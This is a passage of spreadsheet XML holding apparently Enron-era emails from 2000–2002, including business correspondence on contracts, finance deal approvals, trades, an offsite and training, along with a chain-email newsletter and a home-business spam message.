713-412-3667 (mobile)_x000D_
713-646-5745 (fax)_x000D_
Brian_Hoskins@enron.net_x000D_
_x000D_
_x000D_
----- Forwarded by Brian Hoskins/Enron Communications on 12/01/00 09:17 AM _x000D_
-----_x000D_
_x000D_
	Denise Naiser@ENRON_DEVELOPMENT_x000D_
	12/01/00 08:41 AM_x000D_
		 _x000D_
		 To: _x000D_
		 cc: (bcc: Brian Hoskins/Enron Communications)_x000D_
		 Subject: FW: Crime at Christmas_x000D_
_x000D_
_x000D_
_x000D_
 - RABBIT.jpg_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 13 Jul 2001 08:59:10 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Confidentiality Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">    Mary,  Kinder made some changes to our form which are attached below.  I am OK with their changes.  Please prepare two executables for signature._x000D_
-----Original Message-----_x000D_
From: Hilgert, Chris _x000D_
Sent: Thursday, July 12, 2001 7:59 PM_x000D_
To: Nemec, Gerald_x000D_
Subject: FW: Confidentiality Agreement_x000D_
_x000D_
_x000D_
Gerald,_x000D_
 _x000D_
Per my voicemail.  Let's connect first thing in the morning._x000D_
 _x000D_
Thanks,_x000D_
Chris_x000D_
_x000D_
-----Original Message----- _x000D_
From: DeVeau, David _x000D_
Sent: Thu 7/12/2001 6:31 PM _x000D_
To: Hilgert, Chris; Fox, Charles _x000D_
Cc: _x000D_
Subject: Confidentiality Agreement_x000D_
_x000D_
_x000D_
_x000D_
Chris &amp; Chuck -- I have reviewed the draft Confidentiality Agreement in_x000D_
connection with the proposed Transaction (as defined therein) and have made_x000D_
some changes which I believe to be both minor and mutually beneficial.  I_x000D_
have attached hereto both a clean version and a redlined version for your_x000D_
review. Please let me know if you have any questions or comments._x000D_
_x000D_
Regards,_x000D_
_x000D_
David R. DeVeau, Esq._x000D_
Assistant General Counsel_x000D_
Kinder Morgan Energy Partners, L.P._x000D_
One Allen Center Suite 1000_x000D_
500 Dallas_x000D_
Houston, TX 77002_x000D_
Tel. 713-369-9457_x000D_
Fax 713-495-2877_x000D_
David_Deveau@KinderMorgan.com_x000D_
_x000D_
 &lt;&lt;CA-ECS-Kindermorgan071001.doc&gt;&gt; _x000D_
&lt;&lt;CA-ECS-Kindermorgan071001Redlined.doc&gt;&gt;_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 01:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Java class</t>
  </si>
  <si>
    <t xml:space="preserve">Stinson,_x000D_
_x000D_
Let's talk about it at the meeting._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Stinson Gibner_x000D_
02/05/2001 03:51 PM_x000D_
To: Shirley Crenshaw/HOU/ECT@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: Java class_x000D_
_x000D_
Shirley,_x000D_
_x000D_
One other possibility for the class.   If we can find/borrow enough lap tops _x000D_
for everyone to use, we can just get any conference room and use laptops to _x000D_
take the class.     Many members of the group already have one (me,  Martin, _x000D_
Tom Halliburton).    Can we find 10 more?_x000D_
_x000D_
--Stinson_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 04:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Cooper- _x000D_
_x000D_
I wanted to know if you could send down the foward curves for SP, NP &amp; PV.  I _x000D_
also wanted to know if I can access these curves daily here in Houston.  Get _x000D_
back to me when you get a chance.  Thanks for your help._x000D_
_x000D_
Matt Lenhart</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 08:40:31 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'hatter4361@aol.com'})</t>
  </si>
  <si>
    <t>FW: Enron Values cube</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Sorry for the confusion.  I was sending out several emails today.  I will send out the golf balls when I receive your money order.  The address for you to send it to is: Phillip Love, P.O. Box 890086, Houston, TX 77289.  Thanks and sorry for the confusion._x000D_
PL_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Love, Phillip M.  _x000D_
Sent:	Tuesday, January 22, 2002 9:20 AM_x000D_
To:	'hatter4361@aol.com'_x000D_
Subject:	Enron Values cube_x000D_
_x000D_
Congratulations on winning the auction on EBay for the Enron Values cube.  Please let me know if you will be paying by PayPal(alove@houston.rr.com) or by money order/cashier's check.  As soon as I receive payment, I will mail the cube by priority mail.  Please send me your mailing address.  If you respond during the day, respond to this email address, the alove@houston.rr.com is for my home account and I can not access it from work.  Thanks again._x000D_
PL</t>
  </si>
  <si>
    <t>Thu, 24 Feb 2000 11:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Mark,_x000D_
_x000D_
Hope you are well!_x000D_
_x000D_
I've attached the confirmation for the EOL bankruptcy swaps where ENA will be _x000D_
the contracting entity.  I've followed the format of the online ENA swap _x000D_
confirm but kept the economics the same as for the European bankruptcy swap _x000D_
confirm.  Please let me know if you are happy with this.  _x000D_
_x000D_
Thanks, Edmund._x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 10:40:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'updates@send4fun.com'})</t>
  </si>
  <si>
    <t>----&gt; The Beauty of Friendship! A NEW Funpages from Send4fun!</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
----&gt; The Beauty of Friendship! A NEW Funpages from Send4fun!_x000D_
_x000D_
Good day! Hope everyone is enjoying the fall colors! Here's some Funpages for you!_x000D_
_x000D_
Set Me Free!_x000D_
http://www.send4fun.com/setmefree.htm_x000D_
&lt;a href="http://www.send4fun.com/setmefree.htm"&gt;_x000D_
Set Me Free!&lt;/a&gt;_x000D_
_x000D_
The Beauty of Friendship! (NEW!)_x000D_
http://www.send4fun.com/beautyoffriendship.htm_x000D_
&lt;a href="http://www.send4fun.com/beautyoffriendship.htm"&gt;_x000D_
The Beauty of Friendship!&lt;/a&gt;_x000D_
_x000D_
The Splendor of Fall_x000D_
http://www.send4fun.com/splendoroffall.htm_x000D_
&lt;a href="http://www.send4fun.com/splendoroffall.htm"&gt;_x000D_
The Splendor of Fall&lt;/a&gt;_x000D_
_x000D_
Special Offer for Cooks - -3 great books for only $3 with membership.  Choose from famous chefs like - Julia Child, Martha Stewart, Emeril Lagasse, and more._x000D_
http://www.flowgo.com/page.cfm?a=9050_x000D_
&lt;A HREF="http://www.flowgo.com/page.cfm?a=9050"&gt;AOL Link&lt;/A&gt;_x000D_
_x000D_
Sweeter_x000D_
http://www.send4fun.com/sweeter.htm_x000D_
&lt;a href="http://www.send4fun.com/sweeter.htm"&gt;_x000D_
Sweeter&lt;/a&gt;_x000D_
_x000D_
How I Feel about You!_x000D_
http://www.send4fun.com/howifeel.htm_x000D_
&lt;a href="http://www.send4fun.com/howifeel.htm"&gt;_x000D_
How I Feel about You!&lt;/a&gt;_x000D_
_x000D_
Today Love_x000D_
http://www.flowgo.com/flowgo2_view.cfm?page_id=10659_x000D_
&lt;a href="http://www.flowgo.com/flowgo2_view.cfm?page_id=10659"&gt;_x000D_
AOL Link&lt;/a&gt;_x000D_
_x000D_
Visit the #1 coupon site on the Web- CoolSavings. Print coupons from your computer. Save big on food, baby needs, bath &amp; body items, cleaning supplies, cereal and more! And it's FREE!!_x000D_
http://www.flowgo.com/page.cfm?a=9051_x000D_
&lt;A HREF="http://www.flowgo.com/page.cfm?a=9051"&gt;AOL Link&lt;/A&gt;_x000D_
_x000D_
_x000D_
You Know You Might Not Be As Young As You Used To Be When..._x000D_
http://www.funone.com/2001/07/notas/index.html_x000D_
&lt;a href="http://www.funone.com/2001/07/notas/index.html"&gt;_x000D_
AOL Link&lt;/a&gt;_x000D_
_x000D_
Weirdos and Smileys_x000D_
http://www.funnygreetings.com/yousmile.htm_x000D_
&lt;a href="http://www.funnygreetings.com/yousmile.htm"&gt;_x000D_
Weirdos and Smileys&lt;/a&gt;_x000D_
_x000D_
Special To ME_x000D_
http://www.bigfatbaby.com/newfun/specialtome.html_x000D_
&lt;A HREF="http://www.bigfatbaby.com/newfun/specialtome.html"&gt;_x000D_
AOL Link&lt;/a&gt;_x000D_
_x000D_
Save 50-70% on Term Life Insurance with e-term!_x000D_
http://www.flowgo.com/page.cfm?a=9052_x000D_
&lt;A HREF="http://www.flowgo.com/page.cfm?a=9052"&gt;AOL Link&lt;/A&gt;_x000D_
_x000D_
Have a Great Day!_x000D_
----------_x000D_
_x000D_
_x000D_
_x000D_
Send 4 Fun is a FlowGo newsletter.  For more information on FlowGo or to unsubscribe from Send 4 Fun follow the links below:_x000D_
_x000D_
FlowGo_x000D_
http://www.flowgo.com/_x000D_
_x000D_
Privacy Policy_x000D_
http://flowgo.com/privacy.html_x000D_
_x000D_
Unsubscribe_x000D_
_x000D_
http://www.flowgo.com/unsub.cfm?sid=2746140&amp;u=-9454&amp;l=13&amp;m=10620_x000D_
_x000D_
&lt;a href="http://www.flowgo.com/unsub.cfm?sid=2746140&amp;u=-9454&amp;l=13&amp;m=10620"&gt;Unsubscribe&lt;/a&gt;</t>
  </si>
  <si>
    <t>Sun, 20 May 2001 09:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'djunk_epc@yahoo.com'})</t>
  </si>
  <si>
    <t>frozenset({'jongill78@hotmail.com'})</t>
  </si>
  <si>
    <t>Trip Stuff</t>
  </si>
  <si>
    <t>Jon, I'm attaching a memo sent to me by one of my_x000D_
previous Enron people in China.  Lillian Li no longer_x000D_
works for Enron and was not available to help us in_x000D_
Beijing (she got married and will be moving in June)._x000D_
Anyway, she has this travel agency friend who has_x000D_
recommended stuff for Shanghai and Beijing.  It's all_x000D_
spelled out in the attachment.  For 3 days in_x000D_
Shanghai, for ($285 per person for 3 days and_x000D_
nights),$90 USD a day per person which includes hotel,_x000D_
meals, transportation, tickets, etc. sounds_x000D_
reasonable.  What do you think?  I do like the sight_x000D_
seeing she recommended._x000D_
_x000D_
Then, in Beijing for 7 nights in a good hotel,_x000D_
sightseeing, transportation, tickets, tour guide, etc._x000D_
for ($525 per person for 6 days and nights), $88 per_x000D_
day per person didn't sound bad either.  Here in_x000D_
Beijing I like the sightseeing she recommends.  Again,_x000D_
what do you think?_x000D_
_x000D_
What she failed to tell me was the cost of the airline_x000D_
ticket from Shanghai to Qingdao to Beijing.  Could you_x000D_
check on that for us?_x000D_
_x000D_
If there is a better way to skin this cat (no pun_x000D_
intended, just that all these Nancy boys are afraid of_x000D_
the chinese food and all) please advise._x000D_
_x000D_
Congrats,look forward to seeing and hearing from you.....Dan_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Yahoo! Auctions - buy the things you want at great prices_x000D_
http://auctions.yahoo.com/_x000D_
 - Trip.doc</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 10:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frances.ortiz@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">i'll let you know if they invite me this year._x000D_
_x000D_
_x000D_
To: John Arnold/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Hey_x000D_
_x000D_
Hey!  How are you? _x000D_
When Is Amerex throwing there yearly Christmas party?_x000D_
_x000D_
Thanks Frances_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Re: Rudy, Rudy, Rudy</t>
  </si>
  <si>
    <t>i think you see the writing on the wall that we are going to dominate.  who _x000D_
cares about the last two years, it is about now.  we are going to rope-a-dope _x000D_
ya.</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 04:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks very much Scott.  Any view on when we can expect the clean-up bill _x000D_
will be signed?  And is there anything of substance in the "clean-up" _x000D_
provisions that we ought to be aware of?  Thanks again._x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Scott Govenar &lt;sgovenar@govadv.com&gt;_x000D_
	04/11/2001 11:03 AM_x000D_
		 _x000D_
		 To: Jeff.Dasovich@enron.com_x000D_
		 cc: eletke@enron.com, hgovenar@enron.com, Sandra.McCubbin@enron.com, _x000D_
Harry.Kingerski@enron.com, Susan.J.Mara@enron.com, Paul.Kaufman@enron.com_x000D_
		 Subject: Re: SD Cap_x000D_
_x000D_
Jeff,_x000D_
_x000D_
As expected, Governor Davis did sign SBX 43 into law.  I also expect him to_x000D_
sign ABX 43, which is the SBX 43 clean-up bill, into law this week._x000D_
_x000D_
Scott_x000D_
_x000D_
Jeff.Dasovich@enron.com wrote:_x000D_
_x000D_
&gt; Hi Hedy, Scott, Sandi:_x000D_
&gt;_x000D_
&gt; Any news on signing of SB 43? Eric Letke mentioned that Sony--a potential_x000D_
&gt; customer--told him that the Governor signed it on Friday and that they_x000D_
&gt; (Sony) had a representative at the signing.  Any news would be great._x000D_
&gt; Thanks a bunch._x000D_
&gt;_x000D_
&gt; Best,_x000D_
&gt; Jeff_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 03:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kay.chapman@enron.com', 'dorie.hitchcock@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 10/10/2000 _x000D_
10:13 AM ---------------------------_x000D_
_x000D_
_x000D_
David W Delainey_x000D_
10/10/2000 10:12 AM_x000D_
To: Janet R Dietrich/HOU/ECT@ECT, Kevin M Presto/HOU/ECT@ECT, Tim _x000D_
Belden/HOU/ECT@ECT, Christopher F Calger/PDX/ECT@ECT, Scott Neal/HOU/ECT@ECT, _x000D_
Hunter S Shively/HOU/ECT@ECT, Phillip K Allen/HOU/ECT@ECT, Thomas A _x000D_
Martin/HOU/ECT@ECT, John Arnold/HOU/ECT@ECT, W David Duran/HOU/ECT@ECT, Jeff _x000D_
Donahue/HOU/ECT@ECT, Rob Milnthorp/CAL/ECT@ECT, Max Yzaguirre/NA/Enron@ENRON, _x000D_
C John Thompson/Corp/Enron@ENRON, Scott Josey/Corp/Enron@ENRON, Brian _x000D_
Redmond/HOU/ECT@ECT, Jean Mrha/NA/Enron@Enron, David Oxley/HOU/ECT@ECT, Mark _x000D_
E Haedicke/HOU/ECT@ECT, Joseph Deffner/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, _x000D_
Beth Perlman/HOU/ECT@ECT, James D Steffes/NA/Enron@Enron, Wes _x000D_
Colwell/HOU/ECT@ECT_x000D_
cc: Mark Frevert/NA/Enron@Enron, John J Lavorato/Corp/Enron@Enron _x000D_
Subject: 2000 ENA Offsite_x000D_
_x000D_
Guys, please mark your calendars for the 2000 ENA Management Offsite _x000D_
scheduled for December 14th and 15th at the Venetian in Las Vegas.  We _x000D_
envision people flying in the afternoon/evening of December 13th with the _x000D_
offsite being held on December 14th and 15th.  Departure would occur the _x000D_
morning of December 16th.  It is important that everyone stays for the entire _x000D_
period including Friday night.  Jeff Skilling and Greg Whalley have taken _x000D_
time out their schedule to speak to us on Thursday and Friday night about _x000D_
Enron Corps strategy and our eCommerce/Networks strategy respectively._x000D_
_x000D_
A complete agenda will follow shortly._x000D_
_x000D_
Dorie Hitchcock will manage all the logistics._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
</t>
  </si>
  <si>
    <t>Fri, 3 Nov 2000 00:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Commodity / Embedded Finance Deals</t>
  </si>
  <si>
    <t xml:space="preserve">I stand corrected - we need to DASH everything over $500K.  _x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 11/03/2000 _x000D_
08:25 AM ---------------------------_x000D_
_x000D_
_x000D_
David Gorte_x000D_
11/02/2000 07:28 PM_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc: Joseph Deffner/HOU/ECT@ECT, Mark E Haedicke/HOU/ECT@ECT, Rick _x000D_
Buy/HOU/ECT@ECT, John J Lavorato/Corp/Enron@Enron _x000D_
Subject: Re: Commodity / Embedded Finance Deals  _x000D_
_x000D_
Dave,_x000D_
_x000D_
As of today, the Transaction Approval Process requires that any embedded _x000D_
financing over $500,000 needs to be DASHed.  RAC, however, is close to _x000D_
finishing a new process for commodity embedded financings--both prepaids and _x000D_
tilted swaps--that would not require a full DASH but an abbreviated approval _x000D_
document based upon specified credit ratings, financing amounts, and _x000D_
maturities for transactions having standard credit documentation.  For _x000D_
example, a $25 million, five-year exposure to a AAA counterparty with _x000D_
standard documentation is contemplated to be approved via this abbreviated _x000D_
approval document.  This abbreviated approval document would only be _x000D_
available for transactions meeting these criteria if:  (i) structured _x000D_
financing capacity were available, (ii) the funds flow issue created is _x000D_
manageable (both (i) and (ii) as confirmed by EGF), and (iii) the pricing met _x000D_
a threshold that included the structured financing cost, an appropriate _x000D_
credit spread/reserve, and a syndication risk premium._x000D_
_x000D_
The abbreviated approval document is intended to expedite the approval of _x000D_
relatively straightforward embedded financings where a full DASH is _x000D_
impractical or inefficient.  It is presently contemplated that the _x000D_
abbreviated approval document could be approved with two signatures:  the _x000D_
Originator's and  a RAC signature (either Bill Bradford's or mine), with _x000D_
business unit management and EGF receiving weekly updates on transactions _x000D_
approved via this document, but I would welcome your thoughts on this.  In _x000D_
any event, I will provide you with the proposed abbreviated process by you _x000D_
for your review and concurrence before if it is implemented since the _x000D_
preponderance of these transactions are expected to be originated by ENA._x000D_
_x000D_
Please let me know if you have any questions or comments._x000D_
_x000D_
Regards,_x000D_
_x000D_
Dave_x000D_
_x000D_
  _x000D_
_x000D_
_x000D_
_x000D_
David W Delainey_x000D_
11/02/2000 09:25 AM_x000D_
To: Tim Belden/HOU/ECT@ECT_x000D_
cc: David Gorte/HOU/ECT@ECT, Joseph Deffner/HOU/ECT@ECT, John J _x000D_
Lavorato/Corp/Enron@Enron, Mark E Haedicke/HOU/ECT@ECT _x000D_
_x000D_
Subject: Commodity / Embedded Finance Deals_x000D_
_x000D_
Tim, I would argue that we should pursue this business as long as a) we are _x000D_
being adequately compensated for the financing and underlying commodity risk; _x000D_
b) we have very good paper; c) we are dealing with solid credits and are _x000D_
charging an appropriate risk adjusted cost of capital for the underlying _x000D_
financing; d) we have the ability to syndicate the capital or funds flow _x000D_
position if needed to manage cash issues and e) that RAC is comfortable that _x000D_
we are reaching these goals._x000D_
_x000D_
Any imbedded financing or $5M or more should be DASHED.  David, Joe and Mark _x000D_
should be your key contacts to ensure we are adequately managing these issues _x000D_
but I do not see any fatal flaw in the strategy if priced/managed well and we _x000D_
watch the funds flow issues.  _x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
_x000D_
_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 11/02/2000 _x000D_
09:15 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Tim Belden                           10/31/2000 01:54 PM_x000D_
	_x000D_
_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Commodity / Embedded Finance Deals_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Tim Belden/HOU/ECT on 10/31/2000 10:57 AM _x000D_
---------------------------_x000D_
From: Tim Belden on 10/31/2000 11:54 AM_x000D_
To: Dave Delainey_x000D_
cc:  _x000D_
Subject: Commodity / Embedded Finance Deals_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Tim Belden/HOU/ECT on 10/31/2000 10:56 AM _x000D_
---------------------------_x000D_
From: Tim Belden on 10/31/2000 11:52 AM_x000D_
To: John J Lavorato/Corp/Enron, Dave Delainey_x000D_
cc: Christopher F Calger/PDX/ECT@ECT _x000D_
Subject: Commodity / Embedded Finance Deals_x000D_
_x000D_
We have closed the following deals where we deliver power two a muni in the _x000D_
short term and get paid back power later on.  These deals have both a _x000D_
commodity and a finance portion:_x000D_
_x000D_
Counterparty    Loan Period  Repayment Period  Amount Financed_x000D_
_x000D_
Grant County    7/01 to 7/06   7/06   $4.7 million_x000D_
Grant County    5/01 to 7/06   7/06   $5.7 million_x000D_
Avista/Kaiser    7/2000   7/2000 to 7/2006   $31.3 million   _x000D_
BPA/Kaiser    9/2000   7/2001 to 9/2001   $36 million_x000D_
Clatskanie    11/2000 to 9/2001 10/2001 to 9/2006  $5 million_x000D_
Eugene Water and Electric  1/2001 to 3/2002  11/2001 to 4/2002  $4.9 million_x000D_
Eugene Water and Electric  7/2001 to 12/2002 5/2002 to 12/2002  $7.3 million_x000D_
_x000D_
We are seeing demand for more of these.  For example, Tacoma City Light is _x000D_
looking at $35,000,000 + in this type of structure.  What do you guys need to _x000D_
know about this business and how much of an appetite do we have for this?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 06:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Class Request: XMS-822 XMS (Expense Management System) For New_x000D_
 Users, Cathy Phillips</t>
  </si>
  <si>
    <t xml:space="preserve">Approved._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
LeRea Pharr_x000D_
11/28/2000 12:56 PM_x000D_
Sent by: Messaging Agent_x000D_
To: mike.mcconnell@enron.com_x000D_
cc:  _x000D_
Subject: Class Request: XMS-822 XMS (Expense Management System)  For New _x000D_
Users,  Cathy Phillips_x000D_
_x000D_
Your approval is required for Cathy Phillips to attend the following class._x000D_
To grant approval, send a reply to "lpharr@enron.com" (NotesMail: LeRea _x000D_
Pharr/HOU/ECT@ECT)._x000D_
  Be sure to include employee's name and class number in reply._x000D_
_x000D_
XMS (Expense Management System)  For New Users_x000D_
Session Dates &amp; Times: _x000D_
  12/11/2000  1:00:00 PM-4:00:00 PM_x000D_
Location: EB564_x000D_
No Show/Participant Fee: $ 0.00_x000D_
_x000D_
If you have any questions, please call the Technology Training Coordinator at _x000D_
713-853-1816._x000D_
</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 05:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Bill Williams just talked to Jake, the Sempra trader who did the trade, who _x000D_
recognized the deal and said he'd speak with Harry and clear it up. In the _x000D_
meantime, this is a good trade._x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
Stephanie Piwetz   04/03/2001 10:47 AM_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: DEAL 567990.01_x000D_
_x000D_
Kate, _x000D_
Deal 567990.01, trader at Sempra, does not show this trade.   Harry from the _x000D_
backoffice called. _x000D_
Please ask Leaf._x000D_
_x000D_
Thanks_x000D_
Stephanie_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 12:02:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>WestRateSheet</t>
  </si>
  <si>
    <t>Mike,_x000D_
Just wanted to keep you updated on the Rate Sheet project.  Franky sent me this email this morning.  Let me know if there is anything I can do for you in the meantime.  _x000D_
_x000D_
Aaron_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sulistio, Franky _x000D_
Sent: Monday, October 22, 2001 11:10 AM_x000D_
To: Berutti, Aaron_x000D_
Cc: Dronet, David_x000D_
Subject: RE: WestRateSheet_x000D_
_x000D_
_x000D_
Hi Aaron,_x000D_
I may not be able to get to this WestRateSheet until Mid November because I may be taking 2 week family leave starting this wednesday to care for my son._x000D_
_x000D_
I apologize for the delay._x000D_
_x000D_
Regards,_x000D_
Franky_x000D_
_x000D_
-----Original Message-----_x000D_
From: Berutti, Aaron _x000D_
Sent: Wednesday, October 17, 2001 11:00 AM_x000D_
To: Sulistio, Franky_x000D_
Subject: WestRateSheet_x000D_
_x000D_
_x000D_
  _x000D_
 This is the excel sheet that is linked to EOL Listen or we would like to be linked to EOL Listen that hopefully we can make a web page out of so that it can be posted on the plasma screen._x000D_
_x000D_
Aaron_x000D_
 WestRateSheet</t>
  </si>
  <si>
    <t>Thu, 21 Sep 2000 08:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.superty@enron.com', 'russ.severson@enron.com', 'scott.goodell@enron.com', 'donna.greif@enron.com', 'william.kelly@enron.com', 'steve.gillespie@enron.com', 'victor.lamadrid@enron.com'})</t>
  </si>
  <si>
    <t>Agency</t>
  </si>
  <si>
    <t xml:space="preserve">Russ verified that agency transport capacity deals can be set up in Sitara _x000D_
before the agency contract is in Global.  That makes things quicker for Scott _x000D_
and I._x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 04:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: EOL approvals, 03-22-01 _ GCP Response</t>
  </si>
  <si>
    <t xml:space="preserve">Any GCP adjustments will be highlighted in red._x000D_
_x000D_
 _x000D_
_x000D_
Rgds._x000D_
_x000D_
Samuel x3-9890_x000D_
ENW_GCP_x000D_
_x000D_
_x000D_
_x000D_
From: Walter Guidroz/ENRON@enronXgate on 03/22/2001 05:31 PM_x000D_
To: Karen Lambert/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, Samuel _x000D_
Schott/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Brant Reves/ENRON@enronXgate, _x000D_
Debbie R Brackett/HOU/ECT@ECT, David Hardy/LON/ECT@ECT, Lesli _x000D_
Campbell/ENRON@enronXgate, Cynthia Clark/ENRON@enronXgate, Enron Europe _x000D_
Global Contracts and Facilities@ENRON, Enron Europe Global _x000D_
CounterParty/LON/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, Tom _x000D_
Moran/ENRON@enronXgate, Claudia Clark/HOU/ECT@ECT, William S _x000D_
Bradford/ENRON@enronXgate, Lisa Lees/HOU/ECT@ECT, Juana _x000D_
Fayett/Corp/Enron@Enron, Jana Morse/Corp/Enron@Enron, Trang Le/HOU/ECT@ECT, _x000D_
Paul Maley/LON/ECT@ECT, Sonya Clarke/LON/ECT@ECT, Tim Davies/LON/ECT@ECT, _x000D_
Karen O'Day/NA/Enron@Enron, Tanya Rohauer/ENRON@enronXgate, Kelly _x000D_
Lombardi/NA/Enron@Enron, Brian Lindsay/Enron Communications@Enron _x000D_
Communications, EOL Call Center@ENRON, Bernice Rodriguez/HOU/ECT@ECT, Bill D _x000D_
Hare/HOU/ECT@ect, Amy Heffernan/Enron Communications@Enron Communications, _x000D_
Molly LaFuze/Enron Communications@Enron Communications, Danny Clark/Enron _x000D_
Communications@Enron Communications_x000D_
cc:  _x000D_
Subject: EOL approvals, 03-22-01_x000D_
_x000D_
Please see attached._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 Aug 2000 05:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">On Sunday, the new Fortune magazine was a roadway for my two-year old's _x000D_
cars.  On Monday, my sixteen year-old used the cover to cut out pictures of _x000D_
money for a school project.  Last night, the magazine made it into my hands _x000D_
around midnight when everything at home was settled in for the night.  What a _x000D_
nice article!  I smiled while reading it.  How nice to see your _x000D_
accomplishments recognized in print.  Congratulations.  I hope that you have _x000D_
plenty of copies for your mom and dad.  --Sally </t>
  </si>
  <si>
    <t>Thu, 17 Jan 2002 21:33:34 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gfj2v3gf1651@yahoo.com'})</t>
  </si>
  <si>
    <t>frozenset({'undisclosed.recipients@localhost.localdomain'})</t>
  </si>
  <si>
    <t>America's best home based businesses' invitation19662</t>
  </si>
  <si>
    <t>Revolutionary home based business that can make you over $5000 in as little as 6 months._x000D_
_x000D_
Many programs available! If you don't like MLM, face to face selling or internet stores, we still get a few dozen opportunities for you to choose from!_x000D_
_x000D_
If you ever dreamed of staying home, spending more time with your loved ones, and becoming financially free all at the same time, then here's your chance._x000D_
_x000D_
If you have the desire and willingness to earn more income each month and have the ability to follow some simple instructions, you too can become one of the thousands of Americans who are achieving financial freedom every day._x000D_
_x000D_
Please fill out a simple form at http://www.ghzpc.net/bizopp/_x000D_
and get your free information on several most lucrative home based business with absolutely no obligation!_x000D_
_x000D_
Act today!</t>
  </si>
  <si>
    <t>Mon, 11 Jun 2001 11:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dan.fournier@blakes.com'})</t>
  </si>
  <si>
    <t>frozenset({'jim.derrick@enron.com', 'mark.e.haedicke@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: Azurix and BOC</t>
  </si>
  <si>
    <t>Mark and Jim:_x000D_
_x000D_
I am forwarding to you an email from my partner, Brian Westlake, of our _x000D_
Toronto office asking if Enron would have any objections to us acting for a _x000D_
potential buyer of the business carried on by Azurix.  To my knowledge, we _x000D_
have not been retained by Enron as I understand most of the business is _x000D_
located in the United States.  However, should you be looking to retain _x000D_
Blakes in this transaction, I would appreciate it if you would let me know as _x000D_
soon as possible._x000D_
_x000D_
I look forward to your reply and trusting all is well._x000D_
_x000D_
Regards,_x000D_
_x000D_
Dan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Date: Mon, 11 Jun 2001 16:34:58 -0400_x000D_
From: "BRIAN WESTLAKE" &lt;brian.westlake@blakes.com&gt;_x000D_
To: "DAN FOURNIER" &lt;dan.fournier@blakes.com&gt;_x000D_
Subject: Azurix and BOC_x000D_
Mime-Version: 1.0_x000D_
Content-Type: multipart/alternative; boundary="=_95CF86A0.F091E519"_x000D_
_x000D_
 - TEXT.htm</t>
  </si>
  <si>
    <t>Tue, 30 May 2000 03:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Latest Swap Docs</t>
  </si>
